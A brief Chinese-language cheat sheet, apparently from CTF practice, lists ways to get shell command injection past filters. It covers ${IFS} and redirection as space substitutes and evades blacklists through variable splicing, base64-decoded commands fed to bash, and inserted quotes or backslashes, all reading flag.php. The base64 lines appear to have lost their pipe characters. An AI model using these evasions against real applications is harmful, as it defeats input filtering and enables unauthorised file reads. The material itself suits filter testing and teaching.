Shell 命令绕过

空格过滤

  • ${IFS}
  • ${IFS}$1
  • $IFS$1
  • <>
  • <
  • %09(需要PHP环境)

黑名单绕过

  • 拼接
1
2
a=c;b=at;c=ag.php;d=fl;$a$b $d$c
//相当于cat flag.php

image-20210307180610569

  • base64编码payload1
1
2
`echo "Y2F0IGZsYWcucGhw"base64 -d`
//相当于cat flag.php

image-20210307181051662

  • base64编码payload2
1
2
echo "Y2F0IGZsYWcucGhw"base64 -dbash
//相当于cat flag.php
  • 单引号,双引号 c""at fla''g.php image-20210307181340529
  • 反斜杠\
1
c\at fl\ag\.php

image-20210307181558319